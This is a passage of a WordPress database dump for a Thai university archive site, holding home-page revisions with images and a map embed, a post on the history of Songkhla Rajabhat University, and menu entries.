(11, 1, '2019-05-26 09:08:47', '2019-05-26 02:08:47', '', 'logoSKRU-S (1)', '', 'inherit', 'open', 'closed', '', 'logoskru-s-1', '', '', '2019-05-26 09:08:47', '2019-05-26 02:08:47', '', 5, 'http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1.png', 0, 'attachment', 'image/png', 0),
(12, 1, '2019-05-26 09:10:23', '2019-05-26 02:10:23', '<h1><strong>จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา</strong></h1>\r\nบันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n[caption id="attachment_11" align="aligncenter" width="234"]<a href="http://www.skru.ac.th" target="_blank" rel="noopener noreferrer"><img class="wp-image-11 size-medium" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1-234x300.png" alt="" width="234" height="300" /></a> เว็บไซต์มหาวิทยาลัยราชภัฏสงขลา[/caption]\r\n\r\n<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nhttps://youtu.be/0uxQkIus27A\r\n\r\n<iframe style="border: 0;" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1979.303436371049!2d100.61276115648289!3d7.171360398979742!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x304d32ce87369b7f%3A0x3c6b99e70c86f3ab!2z4Lih4Lir4Liy4Lin4Li04LiX4Lii4Liy4Lil4Lix4Lii4Lij4Liy4LiK4Lig4Lix4LiP4Liq4LiH4LiC4Lil4Liy!5e0!3m2!1sth!2sth!4v1558839307053!5m2!1sth!2sth" width="600" height="450" frameborder="0" allowfullscreen="allowfullscreen"></iframe>', 'หน้าแรก', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 09:10:23', '2019-05-26 02:10:23', '', 5, 'http://172.17.40.11/wp511/5-revision-v1/', 0, 'revision', '', 0),
(13, 1, '2019-05-26 09:11:22', '2019-05-26 02:11:22', '<h1><strong>จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา</strong></h1>\r\nบันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n<a href="http://www.skru.ac.th" target="_blank" rel="noopener noreferrer"><img class="aligncenter wp-image-11 size-medium" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1-234x300.png" alt="เว็บไซต์มหาวิทยาลัยราชภัฏสงขลา" width="234" height="300" /></a>\r\n\r\n<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nhttps://youtu.be/0uxQkIus27A\r\n\r\n<iframe style="border: 0;" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1979.303436371049!2d100.61276115648289!3d7.171360398979742!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x304d32ce87369b7f%3A0x3c6b99e70c86f3ab!2z4Lih4Lir4Liy4Lin4Li04LiX4Lii4Liy4Lil4Lix4Lii4Lij4Liy4LiK4Lig4Lix4LiP4Liq4LiH4LiC4Lil4Liy!5e0!3m2!1sth!2sth!4v1558839307053!5m2!1sth!2sth" width="600" height="450" frameborder="0" allowfullscreen="allowfullscreen"></iframe>', 'หน้าแรก', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 09:11:22', '2019-05-26 02:11:22', '', 5, 'http://172.17.40.11/wp511/5-revision-v1/', 0, 'revision', '', 0),
(14, 1, '2019-05-26 09:11:55', '2019-05-26 02:11:55', '<h1><strong>จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา</strong></h1>\r\nบันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n[caption id="attachment_11" align="aligncenter" width="234"]<a href="http://www.skru.ac.th" target="_blank" rel="noopener noreferrer"><img class="wp-image-11 size-medium" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1-234x300.png" alt="" width="234" height="300" /></a> เว็บไซต์มหาวิทยาลัยราชภัฏสงขลา[/caption]\r\n\r\n<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nhttps://youtu.be/0uxQkIus27A\r\n\r\n<iframe style="border: 0;" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1979.303436371049!2d100.61276115648289!3d7.171360398979742!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x304d32ce87369b7f%3A0x3c6b99e70c86f3ab!2z4Lih4Lir4Liy4Lin4Li04LiX4Lii4Liy4Lil4Lix4Lii4Lij4Liy4LiK4Lig4Lix4LiP4Liq4LiH4LiC4Lil4Liy!5e0!3m2!1sth!2sth!4v1558839307053!5m2!1sth!2sth" width="600" height="450" frameborder="0" allowfullscreen="allowfullscreen"></iframe>', 'หน้าแรก', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 09:11:55', '2019-05-26 02:11:55', '', 5, 'http://172.17.40.11/wp511/5-revision-v1/', 0, 'revision', '', 0),
(15, 1, '2019-05-26 09:12:17', '2019-05-26 02:12:17', '<h1><strong>จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา</strong></h1>\r\nบันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n[caption id="attachment_11" align="alignnone" width="234"]<a href="http://www.skru.ac.th" target="_blank" rel="noopener noreferrer"><img class="wp-image-11 size-medium" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1-234x300.png" alt="" width="234" height="300" /></a> เว็บไซต์มหาวิทยาลัยราชภัฏสงขลา[/caption]\r\n\r\n<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nhttps://youtu.be/0uxQkIus27A\r\n\r\n<iframe style="border: 0;" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1979.303436371049!2d100.61276115648289!3d7.171360398979742!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x304d32ce87369b7f%3A0x3c6b99e70c86f3ab!2z4Lih4Lir4Liy4Lin4Li04LiX4Lii4Liy4Lil4Lix4Lii4Lij4Liy4LiK4Lig4Lix4LiP4Liq4LiH4LiC4Lil4Liy!5e0!3m2!1sth!2sth!4v1558839307053!5m2!1sth!2sth" width="600" height="450" frameborder="0" allowfullscreen="allowfullscreen"></iframe>', 'หน้าแรก', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 09:12:17', '2019-05-26 02:12:17', '', 5, 'http://172.17.40.11/wp511/5-revision-v1/', 0, 'revision', '', 0),
(16, 1, '2019-05-26 09:12:31', '2019-05-26 02:12:31', '<h1><strong>จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา</strong></h1>\r\nบันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n[caption id="attachment_11" align="aligncenter" width="234"]<a href="http://www.skru.ac.th" target="_blank" rel="noopener noreferrer"><img class="wp-image-11 size-medium" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1-234x300.png" alt="" width="234" height="300" /></a> เว็บไซต์มหาวิทยาลัยราชภัฏสงขลา[/caption]\r\n\r\n<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nhttps://youtu.be/0uxQkIus27A\r\n\r\n<iframe style="border: 0;" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1979.303436371049!2d100.61276115648289!3d7.171360398979742!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x304d32ce87369b7f%3A0x3c6b99e70c86f3ab!2z4Lih4Lir4Liy4Lin4Li04LiX4Lii4Liy4Lil4Lix4Lii4Lij4Liy4LiK4Lig4Lix4LiP4Liq4LiH4LiC4Lil4Liy!5e0!3m2!1sth!2sth!4v1558839307053!5m2!1sth!2sth" width="600" height="450" frameborder="0" allowfullscreen="allowfullscreen"></iframe>', 'หน้าแรก', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 09:12:31', '2019-05-26 02:12:31', '', 5, 'http://172.17.40.11/wp511/5-revision-v1/', 0, 'revision', '', 0),
(17, 1, '2019-05-26 09:22:30', '2019-05-26 02:22:30', '<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nมหาวิทยาลัยราชภัฏสงขลา เป็นสถาบันอุดมศึกษาที่เก่าแก่ที่สุดแห่งหนึ่งของภาคใต้ และเป็นสถาบันที่มีพัฒนาการอย่างต่อเนื่องตลอดมา ตั้งแต่ยังมีฐานะเป็นเพียงโรงเรียนฝึกหัดครูมณฑล จนกระทั่งเป็นมหาวิทยาลัยราชภัฏสงขลา ดังเช่นปัจจุบัน\r\n\r\nในปีพ.ศ.2462เมื่อธรรมการมณฑลนครศรีธรรมราชซึ่งขณะนั้นอยู่ที่สงขลา และธรรมการจังหวัดสงขลาได้คิดผลิตครูมณฑลขึ้นเพื่อให้ไปทำหน้าที่สอนในระดับประถมศึกษาจึงได้จัดตั้งโรงเรียนฝึกหัดครูมณฑลขึ้น โดยให้เรียนร่วมกับโรงเรียนประจำมณฑลนครศรีธรรมราช(คือโรงเรียนมหาวชิราวุธซึ่งขณะนั้นตั้งอยู่ที่บริเวณโรงเรียนวิเชียรชมในปัจจุบัน) รับนักเรียน จบชั้นประถมบริบูรณ์(ประถมปีที่3)เข้าเรียนตามหลักสูตรป.4,ป.5และป.6โดยเพิ่มวิชาครูเป็นพิเศษผู้สำเร็จการศึกษาตามหลักสูตรดังกล่าวเรียกว่าครูประกาศนียบัตรมณฑล\r\n\r\nในปี พ.ศ. 2464 มีการประกาศใช้พระราชบัญญัติประถมศึกษา ธรรมการมณฑลจึงได้จัดตั้งโรงเรียนฝึกหัดครูประจำมณฑลขึ้นโดยเฉพาะเมื่อ พ.ศ. 2468 โดยตั้งที่ตำบลท่าชะมวง อำเภอกำแพงเพชร (ปัจจุบันคืออำเภอรัตภูมิ) จังหวัดสงขลา เรียกว่าโรงเรียนฝึกหัดครูมูล (ปัจจุบันเป็นที่ตั้งของวิทยาลัยเกษตรกรรมและเทคโนโลยีสงขลา) โดยรับนักเรียนที่จบ ม.3 หรือครูที่ทางอำเภอและจังหวัดต่าง ๆ ส่งมาเรียน กำหนด 2 ปี สำเร็จแล้วจะได้รับประกาศนียบัตรวิชาชีพครูมูล(ป.)\r\n\r\nต่อมาได้มีพระราชบัญญัติว่าด้วยการบริหารแห่งราชอาณาจักรสยาม พ.ศ. 2476 ให้เลิกการแบ่งเขตการ ปกครองเป็นมณฑล โรงเรียนฝึกหัดครูมูลประจำ มณฑลนครศรีธรรมราชที่ท่าชะมวง จึงได้เปลี่ยนเป็นโรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัด เมื่อปี พ.ศ. 2477 โดยรับนักเรียนที่เรียน ป.6 หรือ ม.2 (ตามแผน การศึกษาแห่งชาติ พ.ศ. 2475) เข้าเรียนมีกำหนด 2 ปี ครั้น พ.ศ. 2482 จึงได้เปลี่ยนมาเป็นรับนักเรียน ม.3 เข้าเรียน มีกำหนด 2 ปี ผู้สำเร็จการศึกษาจะได้ประกาศ นียบัตรจังหวัด (ว.)\r\n\r\nนอกจากนี้โรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัด ยังรับนักเรียนที่เตรียมไว้เพื่อบรรจุเป็นครูประชาบาล ซึ่งทางจังหวัดต่าง ๆ ได้คัดเลือกนักเรียนที่จบ ป.4 จากตำบลทุรกันดารในจังหวัดนั้น ๆ มาเข้าเรียน มีกำหนด 3 ปี เมื่อสำเร็จการศึกษาแล้ว จะได้ประโยคครูประชาบาล (ป.บ.) และกลับไปเป็นครูในตำบลที่ตนมีภูมิ ลำเนาอยู่\r\n\r\nปี พ.ศ. 2482 โรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัดสงขลา ได้ย้ายจากท่าชะมวงมาเรียนที่ตำบลคอหงส์ อำเภอหาดใหญ่ และในปี พ.ศ. 2490 ก็เปลี่ยน ฐานะจากโรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัดเป็นโรงเรียนฝึกหัดครูมูลและมี การปรับปรุงหลักสูตรใหม่ โดยรับนักเรียนที่จบชั้นมัธยมปีที่ 6 หรือประโยคประกาศ นียบัตรครูมูล (ว.) เข้าเรียนต่ออีก 1 ปี สำเร็จแล้วจะได้รับประกาศนียบัตรครูมูล (ป.)\r\n\r\nต่อมาใน พ.ศ. 2498 ก็ได้เปิดสอนหลักสูตรประกาศนียบัตรวิชาการศึกษา โดยรับนักเรียนที่จบ ม.6 เข้าเรียน 2 ปี ผู้สำเร็จการศึกษาจะได้รับประกาศนียบัตร วิชาการศึกษา (ป.กศ.) และโรงเรียนฝึกหัดครูมูลสงขลาก็เปลี่ยนเป็นโรงเรียนฝึกหัดครูสงขลา จนกระทั่งเมื่อวันที่ 1 มิถุนายน พ.ศ.2499 จึงได้ย้ายมาตั้งอยู่ ณ บริเวณ บ้านเขารูปช้าง อำเภอเมือง จังหวัดสงขลา อันเป็นสถานที่ตั้งในปัจจุบันและได้ยกฐานะเป็นวิทยาลัยครูสงขลา เมื่อวันที่ 1 พฤษภาคม พ.ศ. 2504 อีกทั้งได้ขยายชั้น เรียนไปจนถึงระดับประกาศนียบัตรวิชาการศึกษาชั้นสูง (ป.กศ.สูง) ในปีเดียวกันนั้นเอง\r\n\r\nครั้นเมื่อถึงปี พ.ศ. 2518 รัฐบาลได้ประกาศใช้พระราชบัญญัติวิทยาลัยครู พ.ศ. 2518 ทำให้วิทยาลัยครูสงขลาเปิดสอนถึงระดับปริญญาตรี ในสาขาครุศาสตร์ โดยรับนักศึกษาที่เรียนจบ ป.กศ.สูง หรือครูประจำการ ที่ได้รับวุฒิ พ.ม. เข้าศึกษาต่อ 2 ปี ผู้สำเร็จการศึกษาจะได้รับวุฒิครุศาสตรบัณฑิต (ค.บ.) และในปี พ.ศ.2522 ก็ได้เปิดโครงการอบรมครูประจำการและบุคลากรทางการศึกษา (อ.ค.ป.)ในระดับ ป.กศ.ชั้นสูงและระดับปริญญาตรี (ค.บ.)หลังจากนั้นในปี พ.ศ.2524 ก็ได้ร่วมมือกับ มหาวิทยาลัยสงขลานครินทร์ เปิดสอนหลักสูตรการโรงแรมและการท่องเที่ยว กับหลักสูตรการเพาะเลี้ยงสัตว์น้ำโดยเรียกโครงการนี้ว่า วิทยาลัยชุมชนสงขลา\r\n\r\nต่อมาในปี พ.ศ.2527 รัฐบาลได้ประกาศใช้พระราชบัญญัติวิทยาลัยครู พ.ศ. 2527 ให้วิทยาลัยครูทำหน้าที่ผลิตครูและเปิดสอนวิชาชีพ ตามความต้องการและ ความจำเป็นของท้องถิ่น วิทยาลัยครูสงขลา จึงได้ผลิตครูระดับปริญญาตรี ครุศาสตรบัณฑิต และบัณฑิตหรือประกาศนียบัตรวิชาชีพอื่นๆ ตามความต้องการและความ จำเป็น ของท้องถิ่นตั้งแต่บัดนั้นเป็นต้นมา และในปี พ.ศ. 2529 ได้เปิดการศึกษาสำหรับบุคลากรประจำการ (กศ.บป.) ในระดับอนุปริญญาและระดับปริญญาตรีสาขา ครุศาสตร์ ซึ่งต่อมาก็ได้ขยายไปสู่สาขาอื่น ๆ คือ ศิลปศาสตร์ และ วิทยาศาสตร์ ดังที่เป็นอยู่ในปัจจุบัน\r\n\r\nประวัติศาสตร์แห่งการเปลี่ยนแปลงครั้งสำคัญ ของสถาบันการศึกษาแห่งนี้ได้เกิดขึ้นอีกครั้งเมื่อ พระบาทสมเด็จพระเจ้าอยู่หัว ทรงพระกรุณาโปรดเกล้า ฯ พระ- ราชทานนาม “ ราชภัฏ ” แทนชื่อวิทยาลัยครูทั่วประเทศ เมื่อวันที่ 14 กุมภาพันธ์ พ.ศ. 2535 ทำให้วิทยาลัยครูสงขลา เปลี่ยนชื่อ สถาบันราชภัฏสงขลา ตั้งแต่บัดนั้น เป็นต้นมา สถาบันราชภัฏสงขลาได้มีความเจริญก้าวหน้ามาเป็นลำดับ จนสามารถเปิดสอนถึงระดับบัณฑิตศึกษาได้ในปี พ.ศ. 2544 และเมื่อวันที่ 15 มิถุนายน พ.ศ. 2547 ก็ได้รับการยกฐานะเป็น มหาวิทยาลัยราชภัฏสงขลา ในที่สุด โดยผู้ช่วยศาสตราจารย์ ดร.ไพโรจน์ ด้วงวิเศษ ดำรงตำแหน่งอธิการบดี', 'ประวัติมหาวิทยาลัยราชภัฏสงขลา', '', 'trash', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%a1%e0%b8%ab%e0%b8%b2%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b8%a3%e0%b8%b2%e0%b8%8a__trashed', '', '', '2019-05-27 08:57:36', '2019-05-27 01:57:36', '', 0, 'http://172.17.40.11/wp511/?p=17', 0, 'post', '', 0),
(18, 1, '2019-05-26 09:22:30', '2019-05-26 02:22:30', '<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\n<img src="http://arit.skru.ac.th/si/images/stories/94889-pic-4-s.jpg" alt="" width="200" height="133" />        ประวัติมหาวิทยาลัยราชภัฏสงขลา มหาวิทยาลัยราชภัฏสงขลา เป็นสถาบันอุดมศึกษาที่เก่าแก่ที่สุดแห่งหนึ่งของภาคใต้ และเป็นสถาบันที่มีพัฒนาการอย่างต่อเนื่องตลอดมา ตั้งแต่ยังมีฐานะเป็นเพียงโรงเรียนฝึกหัดครูมณฑล จนกระทั่งเป็นมหาวิทยาลัยราชภัฏสงขลา ดังเช่นปัจจุบัน\r\n\r\n<img src="http://arit.skru.ac.th/si/images/stories/94889-pic-4-s.jpg" alt="" width="200" height="133" />        ในปีพ.ศ.2462เมื่อธรรมการมณฑลนครศรีธรรมราชซึ่งขณะนั้นอยู่ที่สงขลา และธรรมการจังหวัดสงขลาได้คิดผลิตครูมณฑลขึ้นเพื่อให้ไปทำหน้าที่สอนในระดับประถมศึกษาจึงได้จัดตั้งโรงเรียนฝึกหัดครูมณฑลขึ้น โดยให้เรียนร่วมกับโรงเรียนประจำมณฑลนครศรีธรรมราช(คือโรงเรียนมหาวชิราวุธซึ่งขณะนั้นตั้งอยู่ที่บริเวณโรงเรียนวิเชียรชมในปัจจุบัน) รับนักเรียน จบชั้นประถมบริบูรณ์(ประถมปีที่3)เข้าเรียนตามหลักสูตรป.4,ป.5และป.6โดยเพิ่มวิชาครูเป็นพิเศษผู้สำเร็จการศึกษาตามหลักสูตรดังกล่าวเรียกว่าครูประกาศนียบัตรมณฑล\r\n\r\nในปี พ.ศ. 2464 มีการประกาศใช้พระราชบัญญัติประถมศึกษา ธรรมการมณฑลจึงได้จัดตั้งโรงเรียนฝึกหัดครูประจำมณฑลขึ้นโดยเฉพาะเมื่อ พ.ศ. 2468 โดยตั้งที่ตำบลท่าชะมวง อำเภอกำแพงเพชร (ปัจจุบันคืออำเภอรัตภูมิ) จังหวัดสงขลา เรียกว่าโรงเรียนฝึกหัดครูมูล (ปัจจุบันเป็นที่ตั้งของวิทยาลัยเกษตรกรรมและเทคโนโลยีสงขลา) โดยรับนักเรียนที่จบ ม.3 หรือครูที่ทางอำเภอและจังหวัดต่าง ๆ ส่งมาเรียน กำหนด 2 ปี สำเร็จแล้วจะได้รับประกาศนียบัตรวิชาชีพครูมูล(ป.)\r\n\r\nต่อมาได้มีพระราชบัญญัติว่าด้วยการบริหารแห่งราชอาณาจักรสยาม พ.ศ. 2476 ให้เลิกการแบ่งเขตการ ปกครองเป็นมณฑล โรงเรียนฝึกหัดครูมูลประจำ มณฑลนครศรีธรรมราชที่ท่าชะมวง จึงได้เปลี่ยนเป็นโรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัด เมื่อปี พ.ศ. 2477 โดยรับนักเรียนที่เรียน ป.6 หรือ ม.2 (ตามแผน การศึกษาแห่งชาติ พ.ศ. 2475) เข้าเรียนมีกำหนด 2 ปี ครั้น พ.ศ. 2482 จึงได้เปลี่ยนมาเป็นรับนักเรียน ม.3 เข้าเรียน มีกำหนด 2 ปี ผู้สำเร็จการศึกษาจะได้ประกาศ นียบัตรจังหวัด (ว.)\r\n\r\nนอกจากนี้โรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัด ยังรับนักเรียนที่เตรียมไว้เพื่อบรรจุเป็นครูประชาบาล ซึ่งทางจังหวัดต่าง ๆ ได้คัดเลือกนักเรียนที่จบ ป.4 จากตำบลทุรกันดารในจังหวัดนั้น ๆ มาเข้าเรียน มีกำหนด 3 ปี เมื่อสำเร็จการศึกษาแล้ว จะได้ประโยคครูประชาบาล (ป.บ.) และกลับไปเป็นครูในตำบลที่ตนมีภูมิ ลำเนาอยู่\r\n\r\nปี พ.ศ. 2482 โรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัดสงขลา ได้ย้ายจากท่าชะมวงมาเรียนที่ตำบลคอหงส์ อำเภอหาดใหญ่ และในปี พ.ศ. 2490 ก็เปลี่ยน ฐานะจากโรงเรียนฝึกหัดครูประกาศนียบัตรจังหวัดเป็นโรงเรียนฝึกหัดครูมูลและมี การปรับปรุงหลักสูตรใหม่ โดยรับนักเรียนที่จบชั้นมัธยมปีที่ 6 หรือประโยคประกาศ นียบัตรครูมูล (ว.) เข้าเรียนต่ออีก 1 ปี สำเร็จแล้วจะได้รับประกาศนียบัตรครูมูล (ป.)\r\n\r\nต่อมาใน พ.ศ. 2498 ก็ได้เปิดสอนหลักสูตรประกาศนียบัตรวิชาการศึกษา โดยรับนักเรียนที่จบ ม.6 เข้าเรียน 2 ปี ผู้สำเร็จการศึกษาจะได้รับประกาศนียบัตร วิชาการศึกษา (ป.กศ.) และโรงเรียนฝึกหัดครูมูลสงขลาก็เปลี่ยนเป็นโรงเรียนฝึกหัดครูสงขลา จนกระทั่งเมื่อวันที่ 1 มิถุนายน พ.ศ.2499 จึงได้ย้ายมาตั้งอยู่ ณ บริเวณ บ้านเขารูปช้าง อำเภอเมือง จังหวัดสงขลา อันเป็นสถานที่ตั้งในปัจจุบันและได้ยกฐานะเป็นวิทยาลัยครูสงขลา เมื่อวันที่ 1 พฤษภาคม พ.ศ. 2504 อีกทั้งได้ขยายชั้น เรียนไปจนถึงระดับประกาศนียบัตรวิชาการศึกษาชั้นสูง (ป.กศ.สูง) ในปีเดียวกันนั้นเอง\r\n\r\nครั้นเมื่อถึงปี พ.ศ. 2518 รัฐบาลได้ประกาศใช้พระราชบัญญัติวิทยาลัยครู พ.ศ. 2518 ทำให้วิทยาลัยครูสงขลาเปิดสอนถึงระดับปริญญาตรี ในสาขาครุศาสตร์ โดยรับนักศึกษาที่เรียนจบ ป.กศ.สูง หรือครูประจำการ ที่ได้รับวุฒิ พ.ม. เข้าศึกษาต่อ 2 ปี ผู้สำเร็จการศึกษาจะได้รับวุฒิครุศาสตรบัณฑิต (ค.บ.) และในปี พ.ศ.2522 ก็ได้เปิดโครงการอบรมครูประจำการและบุคลากรทางการศึกษา (อ.ค.ป.)ในระดับ ป.กศ.ชั้นสูงและระดับปริญญาตรี (ค.บ.)หลังจากนั้นในปี พ.ศ.2524 ก็ได้ร่วมมือกับ มหาวิทยาลัยสงขลานครินทร์ เปิดสอนหลักสูตรการโรงแรมและการท่องเที่ยว กับหลักสูตรการเพาะเลี้ยงสัตว์น้ำโดยเรียกโครงการนี้ว่า วิทยาลัยชุมชนสงขลา\r\n\r\nต่อมาในปี พ.ศ.2527 รัฐบาลได้ประกาศใช้พระราชบัญญัติวิทยาลัยครู พ.ศ. 2527 ให้วิทยาลัยครูทำหน้าที่ผลิตครูและเปิดสอนวิชาชีพ ตามความต้องการและ ความจำเป็นของท้องถิ่น วิทยาลัยครูสงขลา จึงได้ผลิตครูระดับปริญญาตรี ครุศาสตรบัณฑิต และบัณฑิตหรือประกาศนียบัตรวิชาชีพอื่นๆ ตามความต้องการและความ จำเป็น ของท้องถิ่นตั้งแต่บัดนั้นเป็นต้นมา และในปี พ.ศ. 2529 ได้เปิดการศึกษาสำหรับบุคลากรประจำการ (กศ.บป.) ในระดับอนุปริญญาและระดับปริญญาตรีสาขา ครุศาสตร์ ซึ่งต่อมาก็ได้ขยายไปสู่สาขาอื่น ๆ คือ ศิลปศาสตร์ และ วิทยาศาสตร์ ดังที่เป็นอยู่ในปัจจุบัน\r\n\r\nประวัติศาสตร์แห่งการเปลี่ยนแปลงครั้งสำคัญ ของสถาบันการศึกษาแห่งนี้ได้เกิดขึ้นอีกครั้งเมื่อ พระบาทสมเด็จพระเจ้าอยู่หัว ทรงพระกรุณาโปรดเกล้า ฯ พระ- ราชทานนาม “ ราชภัฏ ” แทนชื่อวิทยาลัยครูทั่วประเทศ เมื่อวันที่ 14 กุมภาพันธ์ พ.ศ. 2535 ทำให้วิทยาลัยครูสงขลา เปลี่ยนชื่อ สถาบันราชภัฏสงขลา ตั้งแต่บัดนั้น เป็นต้นมา สถาบันราชภัฏสงขลาได้มีความเจริญก้าวหน้ามาเป็นลำดับ จนสามารถเปิดสอนถึงระดับบัณฑิตศึกษาได้ในปี พ.ศ. 2544 และเมื่อวันที่ 15 มิถุนายน พ.ศ. 2547 ก็ได้รับการยกฐานะเป็น มหาวิทยาลัยราชภัฏสงขลา ในที่สุด โดยผู้ช่วยศาสตราจารย์ ดร.ไพโรจน์ ด้วงวิเศษ ดำรงตำแหน่งอธิการบดี', 'ประวัติมหาวิทยาลัยราชภัฏสงขลา', '', 'inherit', 'closed', 'closed', '', '17-revision-v1', '', '', '2019-05-26 09:22:30', '2019-05-26 02:22:30', '', 17, 'http://172.17.40.11/wp511/17-revision-v1/', 0, 'revision', '', 0),
(26, 1, '2019-05-26 09:33:18', '2019-05-26 02:33:18', ' ', '', '', 'publish', 'closed', 'closed', '', '26', '', '', '2019-05-27 09:12:21', '2019-05-27 02:12:21', '', 0, 'http://172.17.40.11/wp511/?p=26', 5, 'nav_menu_item', '', 0),
(27, 1, '2019-05-26 09:33:18', '2019-05-26 02:33:18', ' ', '', '', 'publish', 'closed', 'closed', '', '27', '', '', '2019-05-27 09:12:21', '2019-05-27 02:12:21', '', 0, 'http://172.17.40.11/wp511/?p=27', 6, 'nav_menu_item', '', 0),
(28, 1, '2019-05-26 09:33:18', '2019-05-26 02:33:18', ' ', '', '', 'publish', 'closed', 'closed', '', '28', '', '', '2019-05-27 09:12:21', '2019-05-27 02:12:21', '', 0, 'http://172.17.40.11/wp511/?p=28', 7, 'nav_menu_item', '', 0),
(29, 1, '2019-05-26 09:33:18', '2019-05-26 02:33:18', ' ', '', '', 'publish', 'closed', 'closed', '', '29', '', '', '2019-05-27 09:12:21', '2019-05-27 02:12:21', '', 0, 'http://172.17.40.11/wp511/?p=29', 8, 'nav_menu_item', '', 0),
